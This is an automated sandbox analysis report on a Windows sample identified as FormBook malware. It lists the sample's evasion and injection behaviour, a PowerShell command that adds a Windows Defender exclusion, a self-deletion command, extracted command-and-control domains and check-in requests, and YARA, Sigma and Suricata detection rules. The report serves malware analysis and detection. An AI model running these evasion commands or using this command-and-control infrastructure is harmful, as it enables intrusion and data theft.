Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F #U0130ST.exe

Overview

General Information

Sample name:TEKL#U0130F #U0130ST.exe
renamed because original name is a hash value
Original sample name:TEKLF ST.exe
Analysis ID:1549204
MD5:88153ac6837f5034a7ab44259c90f4dd
SHA1:90085bacffa3b6a75252f9e06af2d7ac54886e75
SHA256:23bc8acbb8a1e716512ac2ea9426d3fc46938cccac426f344c0314aafb17769e
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TEKL#U0130F #U0130ST.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: 88153AC6837F5034A7AB44259C90F4DD)
    • powershell.exe (PID: 4424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3652 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • TEKL#U0130F #U0130ST.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: 88153AC6837F5034A7AB44259C90F4DD)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • mstsc.exe (PID: 3900 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • cmd.exe (PID: 6056 cmdline: /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
      • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
      00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 37 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpackWindows_Trojan_Diceloader_15eeb7b9unknownunknown
          • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
          4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-05T12:28:47.553120+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849712TCP
          2024-11-05T12:29:25.966033+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849717TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-05T12:29:47.524742+010020314531Malware Command and Control Activity Detected192.168.2.849784185.26.122.7080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.ewferg.top/bc01/Avira URL Cloud: Label: malware
          Source: http://www.ewferg.top/bc01/www.52cy67sk.bondAvira URL Cloud: Label: malware
          Source: http://www.ewferg.topAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}
          Multi AV Scanner detection for submitted file
          Source: TEKL#U0130F #U0130ST.exeReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: TEKL#U0130F #U0130ST.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008010C5 CryptProtectData,LocalAlloc,memcpy,LocalFree,8_2_008010C5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00801187 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,8_2_00801187
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080F157 CryptMsgOpenToDecode,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,CertOpenStore,CryptMsgClose,8_2_0080F157
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008012E0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,8_2_008012E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00801248 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,8_2_00801248
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007E8511 CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,8_2_007E8511
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008876CC CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,8_2_008876CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080E8E0 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore,8_2_0080E8E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080A940 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,8_2_0080A940
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080AAC0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,8_2_0080AAC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007D3C2A memset,CryptUIDlgViewCertificateW,GetLastError,8_2_007D3C2A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080DE70 memset,RegOpenKeyExW,RegQueryValueExW,malloc,RegQueryValueExW,wcstombs_s,malloc,wcstombs_s,CryptSignMessage,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,free,free,RegCloseKey,8_2_0080DE70
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: rFP.pdb source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130ST.exe, TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rFP.pdbSHA256 source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: mstsc.pdbGCTL source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007D26C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose,8_2_007D26C7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4x nop then pop edi4_2_0040E461

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.26.122.70 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.avada-casino-tlj.buzz/bc01/
          Source: global trafficHTTP traffic detected: GET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: HOSTLANDRU HOSTLANDRU
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49717
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49712
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEACF82 getaddrinfo,setsockopt,recv,6_2_0DEACF82
          Source: global trafficHTTP traffic detected: GET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.2ar1.shop
          Source: global trafficDNS traffic detected: DNS query: www.obs-for-seniors-39582.bond
          Source: global trafficDNS traffic detected: DNS query: www.oko.events
          Source: global trafficDNS traffic detected: DNS query: www.aming-chair-83359.bond
          Source: global trafficDNS traffic detected: DNS query: www.refabricated-homes-74404.bond
          Source: global trafficDNS traffic detected: DNS query: www.nline-degree-6987776.world
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000000.1561108921.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2808794232.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000002.2814156946.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2807627861.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1565613332.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1552438954.000000000338B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: TEKL#U0130F #U0130ST.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2ar1.shop
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2ar1.shop/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.2ar1.shopReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.52cy67sk.bond
